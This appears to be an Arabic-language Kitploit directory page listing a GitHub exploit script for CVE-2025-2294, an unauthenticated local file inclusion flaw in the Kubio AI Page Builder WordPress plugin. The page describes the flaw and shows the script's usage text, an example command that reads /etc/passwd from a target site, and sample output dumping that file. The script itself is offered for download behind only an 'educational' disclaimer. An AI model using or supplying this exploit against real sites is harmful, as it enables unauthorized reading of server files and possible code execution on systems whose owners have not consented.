Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2294 — Kubio AI Page Builder <= 2.5.1 - تضمين ملف محلي غير مصادق عليه | Kitploit
أدوات/GitHubGitHub/rhz0d/cve-2025-2294
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubrhz0d/cve-2025-2294

CVE-2025-2294

Kubio AI Page Builder <= 2.5.1 - تضمين ملف محلي غير مصادق عليه

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 Kubio AI Page Builder <= 2.5.1 - تضمين ملف محلي غير مصادق عليه

📝 الوصف

يُعد إضافة Kubio AI Page Builder لووردبريس عرضة لثغرة تضمين الملفات المحلية في جميع الإصدارات حتى 2.5.1 عبر دالة kubio_hybrid_theme_load_template. وهذا يتيح للمهاجمين غير المصادقين تضمين وتنفيذ ملفات عشوائية على الخادم، مما يسمح بتنفيذ أي كود PHP في تلك الملفات. يمكن استخدام هذا لتجاوز ضوابط الوصول، أو الحصول على بيانات حساسة، أو تحقيق تنفيذ كود في الحالات التي يمكن فيها رفع وتضمين الصور وأنواع الملفات "الآمنة" الأخرى.

  • CVE: CVE-2025-2294
  • CVSS: 9.8 (حرج)
  • تاريخ النشر العام: 27 مارس 2025
  • آخر تحديث: 27 مارس 2025

💥 تفاصيل الاستغلال

يستغل هذا السكريبت الثغرة في إضافة Kubio AI Page Builder لتضمين وتنفيذ ملفات عشوائية على الخادم. يتيح الاستغلال للمهاجمين غير المصادقين قراءة ملفات حساسة من الخادم.

⚙️ المتطلبات

  • Python 3.x
  • مكتبة requests

🚀 الاستخدام

root@kitploit:~
usage: CVE-2025-2294.py [-h] -u URL [-f FILE]

Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By: rHz0d

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target base URL (e.g., https://example.com)
  -f FILE, --file FILE  File to read (default: /etc/passwd)

📋 مثال

root@kitploit:~
python3 CVE-2025-2294.py -u https://targetwebsite.com -f /etc/passwd

🔍 المخرجات

root@kitploit:~
[+] Target is vulnerable. Exploiting...
[+] Exploit successful. File content:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
tss:x:101:104:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin


⚠️ إخلاء مسؤولية

يُقدم هذا الاستغلال لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي سوء استخدام لهذه الأداة. استخدمها على مسؤوليتك الخاصة.

من إعداد: rHz0d

تنزيل الأداة